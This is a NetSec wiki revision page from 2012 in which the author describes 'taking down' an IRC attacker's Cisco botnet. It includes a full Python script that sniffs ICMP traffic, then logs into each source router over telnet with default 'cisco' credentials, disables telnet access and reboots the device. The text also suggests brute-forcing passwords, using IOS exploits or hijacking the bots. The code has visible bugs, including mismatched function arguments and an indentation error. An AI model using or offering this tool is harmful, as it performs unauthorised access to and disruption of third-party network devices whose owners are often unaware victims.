Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "DDoS Attacks/takedowns/Krashed"

From NetSec
Jump to: navigation, search
Line 3: Line 3:
 
* Aliases: Krashed, [Krashed].
 
* Aliases: Krashed, [Krashed].
  
Upon joining my IRC network, Krashed DDoS'd it with his fail Cisco botnet. He scans for routers with the default login as "cisco" then uses them in fail DDoS attacks. To combat this, I wrote the script below which detects incoming ICMP packets (yes, he does use ICMP floods), then telnets back to the connection, logs in with "cisco", runs the enable command to elevate privileges, disables telnet and reboots the router to stop the running attack and prevent any future attacks. He could not put me down after this. It also has support for tcpdump logs and lists of IP addresses, in case you use it after the fact.
+
Upon joining my IRC network, Krashed DDoS'd it with his fail Cisco botnet. He scans for routers with the default login as "cisco" then uses them in fail DDoS attacks. To combat this, I wrote the script below which detects incoming ICMP packets (yes, he does use ICMP floods), then telnets back to the connection, logs in with "cisco", runs the enable command to elevate privileges, disables telnet and reboots the router to stop the running attack and prevent any future attacks. He could not put me down after this. It also has support for tcpdump logs and lists of IP addresses, in case you use it after the fact. While this script uses default passwords, it could be modified to use a Cisco IOS exploit or bruteforce the passwords, in case he gets smart (not likely, look at who we are dealing with here, he uses Ciscos).
  
 
{{code|text=<source lang="python">
 
{{code|text=<source lang="python">

Revision as of 19:41, 16 July 2012

Subject Identification

  • First encounter: 2600net, fail DDoS'd home router.
  • Aliases: Krashed, [Krashed].

Upon joining my IRC network, Krashed DDoS'd it with his fail Cisco botnet. He scans for routers with the default login as "cisco" then uses them in fail DDoS attacks. To combat this, I wrote the script below which detects incoming ICMP packets (yes, he does use ICMP floods), then telnets back to the connection, logs in with "cisco", runs the enable command to elevate privileges, disables telnet and reboots the router to stop the running attack and prevent any future attacks. He could not put me down after this. It also has support for tcpdump logs and lists of IP addresses, in case you use it after the fact. While this script uses default passwords, it could be modified to use a Cisco IOS exploit or bruteforce the passwords, in case he gets smart (not likely, look at who we are dealing with here, he uses Ciscos). 

 
#!/usr/bin/python
 
# botnet-takedown.py
# (C) 2012 rorschach
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 1, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
# ----------------------------------------------------------------------
#
# Cisco botnet takedown script.
# Written by rorschach
# Use at your own risk, the actions taken by this app may not be legal.
#
# Run in daemon mode (-d) it will listen for ICMP packets, when it sees one
# it will attempt to attack the IP. 
#
# In tcpdump parse mode (-t) it will parse a tcpdump log for offending
# IP addresses.
#
# In IP list mode (-i) it simply takes in a list of IP adresses to attack.
#
# This script will login to open Cisco routers, turn off telnet and
# then reboot it. The functionality could be modified to do things
# like take over the bot so only you can use it, turn the attack on
# the attacker, etc. The sky is really the limit here. Modify the 
# takedown() function for this.
#
# Dependencies: python 2.x and scapy
# To install on Ubuntu:
#
#  sudo apt-get install python-scapy
#
# This script must be ran as root if using daemon mode, due to the fact
# that it sniffs packets using scapy.
#
# Enjoy the script.
 
import sys, telnetlib, re, os, time, socket, threading
from threading import Thread
from scapy.all import *
 
def usage(argZero):
  print "Usage: " + argZero
  print "  * -d               -- Daemon mode, parse IPs live from incoming ICMP packets."
  print "  * -t <tcpdump log> -- Parse IPs from tcpdump log."
  print "  * -i <ip list>     -- Load IPs from list."
  exit(1) 
 
def takedown(ip):    # Disable router using telnet.
  print " [*] Disabling " + ip.rstrip()
  try:
    tn = telnetlib.Telnet(ip,23,2)
 
    tn.read_until("Password:", timeout=2) # modify these commands to change functionality
    tn.write("cisco\n")
    tn.read_until(">", timeout=2)
    tn.write("enable\n")
    tn.read_until("Password:", timeout=2)
    tn.write("cisco\n")
    tn.read_until("#", timeout=2)
    tn.write("config\n")
    tn.read_until("Configuring from terminal, memory, or network [terminal]?", timeout=2)
    tn.write("\n")
    tn.read_until("(config)#", timeout=2)
    tn.write("line vty 0 4\n")
    tn.read_until("(config-line)#", timeout=2)
    tn.write("transport input none\n")
    tn.read_until("(config-line)#", timeout=2)
    tn.write("^Z\n")
    tn.read_until("#", timeout=2)
    tn.write("reload\n")
    tn.read_until("System configuration has been modified. Save? [yes/no]:", timeout=2)
    tn.write("yes\n")
    tn.read_until("Proceed with reload? [confirm]", timeout=2)
    tn.write("\n")
 
    tn.close()
  except:
    print "  [*] Error: " + ip.rstrip()
 
def takedownParse(pkt,ips): # Parse packets, check to make sure it is an ICMP echo-request, then make sure it has never been seen before, at that point run takedown()
  if(pkt.summary().split()[2] == "ICMP" and pkt.summary().split()[6] == "echo-request"):
    ip = pkt.summary().split()[3]
    check = 0
    for eip in ips:
      if ip.rstrip() == eip.rstrip():
        check = 1
        break
    if check == 0:
      ips.append(ip)
      f = open("/root/takedown.log", "a+")
      f.write(ip + "\r\n")
      f.close()
      t = threading.Thread(target=takedown,args=(ip,))
      t.start()
 
def loadIPs(file):  # load IP list from file
  f = open(file, "r")
  ips = f.readlines()
  f.close()
 
  for ip in ips:
    takedown(ip.rstrip())
 
def parseDumpLogs(host, logFile):  # parse tcpdump logs
  currentTime = time.time()
  num = 0
  print " [*] Initiating takedown"
  print " [*] Reading tcpdump file"
 
  f = open(logFile, "r")  # open log, filter out non-icmp packets
  ips = f.readlines()
  for n,ip in enumerate(ips):
    try:
      if ip.split()[5] == "icmp":
        ips[n] = ip.split()[2].rstrip()
      else:
        ips[n] = "null"
    except:
      pass
 
  ips = list(set(ips))   # remove duplicates
 
  print " [*] Resolving hostnames to IP addresses"
 
  for n,ip in enumerate(ips):  # if there is a letter in the IP, resolve it to an IP address
    if(re.search("[a-zA-Z]",ip) != None and ip != socket.gethostname() and ip != "null"):
          try:
        tempIP = socket.gethostbyname(ip)
        if(tempIP != None):
          ips[n] = tempIP.rstrip()
      except:
        pass
 
  for n,ip in enumerate(ips): # remove extraneous data
    if(ip != socket.gethostname() and ip != "null" and ip != ""):
      if(ip.find(":") != -1):
        ips[n] = "null"
      else:
        num += 1
 
  print " [*] Taking down " + str(num) + " zombies"
 
  for ip in ips:        # takedown each IP address
    if(ip != socket.gethostname() and ip != "null" and ip != ""):
      takedown(ip)
 
  print " [*] Takedown complete\r\n\r\nTook down " + str(num) + " IPs in " + str(time.time() / currentTime) + " seconds."
 
def takedownDaemon():       # start sniffing and read IP log
  f = open("/root/takedown.log", "r")
  ips = f.readlines()
  f.close()
 
  print "\r\n -- IPs previously taken down -- \r\n"
  for ip in ips:
    print " [*] " + ip.rstrip()
  print "\r\n ------------------------------- \r\n"
 
  if os.fork() == 0:
    if os.fork() == 0:
      sniff(prn=lambda pkt:takedownParse(pkt,ips), store=0)
 
def main():
  print "botnet-takedown.py"
 
  if(len(sys.argv) < 2):
    usage(sys.argv[0])
 
  if(sys.argv[1] == "-d"):  # daemon mode
    takedownDaemon(sys.argv[2])
 
  elif(sys.argv[1] == "-t"): # tcpdump logs
    if(len(sys.argv) == 3):
      parseDumpLogs(sys.argv[2])
    else:
      usage(sys.argv[0])
 
  elif(sys.argv[1] == "-i"): # ip log mode
    if(len(sys.argv) == 3):
      loadIPs(sys.argv[2])
    else:
      usage(sys.argv[0])
 
  else:
    usage(sys.argv[0])
 
if __name__ == "__main__":
  main()
 
Retrieved from "http://nets.ec/index.php?title=DDoS_Attacks/takedowns/Krashed&oldid=7970"